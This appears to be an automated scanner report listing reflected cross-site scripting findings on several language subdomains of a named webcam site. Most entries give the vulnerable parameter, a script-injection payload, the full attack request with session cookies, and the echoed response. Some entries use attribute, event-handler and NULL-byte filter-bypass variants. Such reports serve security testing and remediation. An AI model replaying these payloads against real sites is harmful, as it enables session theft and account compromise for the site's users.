GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=650a2"><script>alert(1)</script>068f5418f8&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: ar.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: spvdr=vd=fc1f7965-56a7-4e4d-8aed-9844cc5adf9a&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; __utmc=71081352; ASP.NET_SessionId=fqzehq45mvboz255wmce5e45;
The value of the promocode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43d88"><script>alert(1)</script>5d1a3a1c243 was submitted in the promocode parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA558343d88"><script>alert(1)</script>5d1a3a1c243&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: ar.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: spvdr=vd=fc1f7965-56a7-4e4d-8aed-9844cc5adf9a&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; __utmc=71081352; ASP.NET_SessionId=fqzehq45mvboz255wmce5e45;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-AR" lang="es-AR" d ...[SNIP]... <a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA558343d88"><script>alert(1)</script>5d1a3a1c243&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;"> ...[SNIP]...
2.7. http://br.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://br.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34723"><a>3f71d325883 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /?34723"><a>3f71d325883=1 HTTP/1.1 Host: br.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-PT" lang="pt-PT" d ...[SNIP]... <a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||34723"><a>3f71d325883~1');return false;"> ...[SNIP]...
2.8. http://br.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://br.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a910'-alert(1)-'8200d22e901 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?3a910'-alert(1)-'8200d22e901=1 HTTP/1.1 Host: br.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-PT" lang="pt-PT" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=br.imlive.com&ul=/?3a910'-alert(1)-'8200d22e901=1&qs=3a910'-alert(1)-'8200d22e901=1&qs=3a910'-alert(1)-'8200d22e901=1&iy=dallas&id=44&iu=1&vd=b00d0ff4-12cf-4179-8b1b-240f4a4d01b6';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach ...[SNIP]...
2.9. http://br.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://br.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6051e"><script>alert(1)</script>af1af9033d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?6051e"><script>alert(1)</script>af1af9033d9=1 HTTP/1.1 Host: br.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: spvdr=vd=4fe45243-c119-4c27-af24-3a1035e21f79&sgid=0&tid=0; __utmz=90051912.1296227188.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; BIGipServerlanguage.imlive.com=2215904834.20480.0000; ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; __utma=90051912.2015373959.1296227188.1296227188.1296227188.1; __utmc=90051912; __utmb=90051912.1.10.1296227188; ASP.NET_SessionId=robavyerei5nryejqqx3qs45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/ X-Powered-By: vsrv32 Date: Fri, 28 Jan 2011 16:44:58 GMT Connection: close Content-Length: 21217
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-PT" lang="pt-PT" d ...[SNIP]... <a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/?6051e"><script>alert(1)</script>af1af9033d9=1');return false;"> ...[SNIP]...
The value of the cbname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6113a"><script>alert(1)</script>fb907eb99cc was submitted in the cbname parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=6113a"><script>alert(1)</script>fb907eb99cc&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: br.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: spvdr=vd=4fe45243-c119-4c27-af24-3a1035e21f79&sgid=0&tid=0; __utmz=90051912.1296227188.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; BIGipServerlanguage.imlive.com=2215904834.20480.0000; ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; __utma=90051912.2015373959.1296227188.1296227188.1296227188.1; __utmc=90051912; __utmb=90051912.1.10.1296227188; ASP.NET_SessionId=robavyerei5nryejqqx3qs45;
The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d687a"><script>alert(1)</script>9d2e569021a was submitted in the from parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=d687a"><script>alert(1)</script>9d2e569021a&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: br.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: spvdr=vd=4fe45243-c119-4c27-af24-3a1035e21f79&sgid=0&tid=0; __utmz=90051912.1296227188.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; BIGipServerlanguage.imlive.com=2215904834.20480.0000; ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; __utma=90051912.2015373959.1296227188.1296227188.1296227188.1; __utmc=90051912; __utmb=90051912.1.10.1296227188; ASP.NET_SessionId=robavyerei5nryejqqx3qs45;
The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 661d9'style%3d'x%3aexpression(alert(1))'99e183046e6 was submitted in the gotopage parameter. This input was echoed as 661d9'style='x:expression(alert(1))'99e183046e6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=661d9'style%3d'x%3aexpression(alert(1))'99e183046e6 HTTP/1.1 Host: br.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:17:02 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ix=k; path=/ Set-Cookie: ibr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/ Set-Cookie: ASPSESSIONIDSQSSRDRC=BDNHCJMAKNOJHLDBKMBBNOGJ; path=/ X-Powered-By: web13 Date: Fri, 28 Jan 2011 14:17:02 GMT Connection: close Content-Length: 8329 Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
The value of the promocode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfad6"><script>alert(1)</script>6b350e8e83c was submitted in the promocode parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583cfad6"><script>alert(1)</script>6b350e8e83c&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: br.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: spvdr=vd=4fe45243-c119-4c27-af24-3a1035e21f79&sgid=0&tid=0; __utmz=90051912.1296227188.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; BIGipServerlanguage.imlive.com=2215904834.20480.0000; ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; __utma=90051912.2015373959.1296227188.1296227188.1296227188.1; __utmc=90051912; __utmb=90051912.1.10.1296227188; ASP.NET_SessionId=robavyerei5nryejqqx3qs45;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-PT" lang="pt-PT" d ...[SNIP]... <a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583cfad6"><script>alert(1)</script>6b350e8e83c&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;"> ...[SNIP]...
2.14. http://cafr.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://cafr.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b38ec'-alert(1)-'84ce48297e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?b38ec'-alert(1)-'84ce48297e3=1 HTTP/1.1 Host: cafr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-CA" lang="fr-CA" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=cafr.imlive.com&ul=/?b38ec'-alert(1)-'84ce48297e3=1&qs=b38ec'-alert(1)-'84ce48297e3=1&qs=b38ec'-alert(1)-'84ce48297e3=1&iy=dallas&id=44&iu=1&vd=ed834416-472f-4af7-b757-36e07f79cd57';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach ...[SNIP]...
2.15. http://cafr.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://cafr.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5433f"><script>alert(1)</script>d728cbd751f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?5433f"><script>alert(1)</script>d728cbd751f=1 HTTP/1.1 Host: cafr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; spvdr=vd=1caf2e8c-d394-4b4b-8d42-4522f3acd241&sgid=0&tid=0; __utmz=125671448.1296227257.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/12; BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=125671448.1984707985.1296227257.1296227257.1296227257.1; __utmc=125671448; __utmb=125671448.1.10.1296227257; ASP.NET_SessionId=yu2e5055awk4st45vhvswz45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/ X-Powered-By: vsrv32 Date: Fri, 28 Jan 2011 16:45:06 GMT Connection: close Content-Length: 22643
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-CA" lang="fr-CA" d ...[SNIP]... <a class="cafr" title="Fran..ais (Canada)" href="http://cafr.imlive.com/" onclick="dAccess('http://cafr.imlive.com/?5433f"><script>alert(1)</script>d728cbd751f=1');return false;" lang="fr-CA" hreflang="fr-CA"> ...[SNIP]...
2.16. http://cafr.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://cafr.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d05ee"><script>alert(1)</script>a1533097529 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d05ee"><script>alert(1)</script>a1533097529 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /?%00d05ee"><script>alert(1)</script>a1533097529=1 HTTP/1.1 Host: cafr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the cbname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd05a"><script>alert(1)</script>cbe3a729d46 was submitted in the cbname parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=fd05a"><script>alert(1)</script>cbe3a729d46&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: cafr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; spvdr=vd=1caf2e8c-d394-4b4b-8d42-4522f3acd241&sgid=0&tid=0; __utmz=125671448.1296227257.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/12; BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=125671448.1984707985.1296227257.1296227257.1296227257.1; __utmc=125671448; __utmb=125671448.1.10.1296227257; ASP.NET_SessionId=yu2e5055awk4st45vhvswz45;
The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8372"><script>alert(1)</script>d63676c4113 was submitted in the from parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=a8372"><script>alert(1)</script>d63676c4113&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: cafr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; spvdr=vd=1caf2e8c-d394-4b4b-8d42-4522f3acd241&sgid=0&tid=0; __utmz=125671448.1296227257.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/12; BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=125671448.1984707985.1296227257.1296227257.1296227257.1; __utmc=125671448; __utmb=125671448.1.10.1296227257; ASP.NET_SessionId=yu2e5055awk4st45vhvswz45;
The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b90b7'onerror%3d'alert(1)'58d5403e5f1 was submitted in the gotopage parameter. This input was echoed as b90b7'onerror='alert(1)'58d5403e5f1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=b90b7'onerror%3d'alert(1)'58d5403e5f1 HTTP/1.1 Host: cafr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:17:02 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ix=k; path=/ Set-Cookie: icafr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/ Set-Cookie: ASPSESSIONIDQSQQQDTD=FAMDOIMABGHKKJABIPAJKPBJ; path=/ X-Powered-By: web13 Date: Fri, 28 Jan 2011 14:17:03 GMT Connection: close Content-Length: 8309 Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
The value of the promocode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 980ab"><script>alert(1)</script>eacf27c2ca8 was submitted in the promocode parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583980ab"><script>alert(1)</script>eacf27c2ca8&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: cafr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; spvdr=vd=1caf2e8c-d394-4b4b-8d42-4522f3acd241&sgid=0&tid=0; __utmz=125671448.1296227257.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/12; BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=125671448.1984707985.1296227257.1296227257.1296227257.1; __utmc=125671448; __utmb=125671448.1.10.1296227257; ASP.NET_SessionId=yu2e5055awk4st45vhvswz45;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-CA" lang="fr-CA" d ...[SNIP]... <a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583980ab"><script>alert(1)</script>eacf27c2ca8&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;"> ...[SNIP]...
2.21. http://de.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://de.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23d94"><script>alert(1)</script>9f278dc55b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?23d94"><script>alert(1)</script>9f278dc55b9=1 HTTP/1.1 Host: de.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de-DE" lang="de-DE" d ...[SNIP]... <a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||23d94"><script>alert(1)</script>9f278dc55b9~1');return false;"> ...[SNIP]...
2.22. http://de.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://de.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 621b5'-alert(1)-'46747e803cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?621b5'-alert(1)-'46747e803cf=1 HTTP/1.1 Host: de.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the cbname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e12af"><script>alert(1)</script>f4d60ab8f81 was submitted in the cbname parameter. This input was echoed unmodified in the application's response.
